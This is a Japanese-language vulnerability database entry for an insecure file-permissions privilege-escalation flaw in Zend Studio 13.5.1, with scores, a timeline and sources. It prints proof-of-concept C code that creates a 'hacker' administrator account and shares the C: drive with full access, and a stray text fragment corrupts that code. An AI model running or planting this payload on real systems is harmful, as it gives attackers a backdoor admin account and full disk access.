| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 4.8 | $0-$5k | 0.00 |
問題がある として分類されている脆弱性が Zend Studio 13.5.1 内に見つかりました。 影響を受けるのは、コンポーネント【File Permission】の未知の関数です。 未知の値で改ざんすることが、 特権昇格を突く攻撃に繋がります。 この問題をCWEでは、CWE-269 と定義しました。 この脆弱性は 2016年10月12日に John Page (hyp3rlinx)より「Bugtraq」の Mailinglist Postにて 紹介されました。 アドバイザリーは seclists.org にてダウンロード用に公開されています。
入手できる技術的詳細情報はありません。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。 MITRE ATT&CKプロジェクトは、攻撃手法を T1068 と定義しています。 アドバイザリーは次を指摘しています。
ZendStudio IDE uses weak insecure permissions settings on its files/directory as the ?Everyone? group has full access on it. Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. "Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest and LOCAL_SERVICE.
このエクスプロイトツールは proof-of-concept として宣言されています。 エクスプロイトツールは seclists.org にダウンロードのために共有されています。 脆弱性は、少なくとも 12 日の間、非公開の0day攻撃ツールとして扱われました。 0dayとして、推定される闇市場取引価格はおよそ $25k-$100k でした。 エクスプロイトツールには下記のコードが含まれています。
#include<windows.h>】のプラグインを提供しています。int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker /add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\Program Files (x86)\Zend\Zend Studio 13.5.1\~ZendStudio.exe",0); return 0; }
製品
ベンダー
名前
バージョン
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB 方向性: 🔍
VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 5.3VulDB 一時的なメタスコア: 4.8
VulDB ベーススコア: 5.3
VulDB 一時的なスコア: 4.8
VulDB 方向性: 🔍
VulDB 信頼性: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 方向性 | 複雑度 | 認証 | 守秘義務性 | 誠実性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
悪用する
クラス: 特権昇格CWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
ローカル: はい
リモート: いいえ
可用性: 🔍
アクセス: パブリック
ステータス: Proof-of-Concept
作成者: John Page
プログラミング言語: 🔍
ダウンロード: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブ アクター: 🔍
アクティブな APT グループ: 🔍
対策
推奨: 既知の緩和策なしステータス: 🔍
0day日時: 🔍
エクスプロイト遅延日時: 🔍
タイムライン
2016年09月30日 🔍2016年10月12日 🔍
2016年10月12日 🔍
2016年10月13日 🔍
2019年05月09日 🔍
ソース
アドバイザリー: seclists.org調査者: John Page (hyp3rlinx)
ステータス: 未定義
scip Labs: https://www.scip.ch/en/?labs.20161013
エントリ
作成済み: 2016年10月13日 17:59更新済み: 2019年05月09日 09:16
変更: 2016年10月13日 17:59 (48), 2019年05月09日 09:16 (1)
完了: 🔍
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。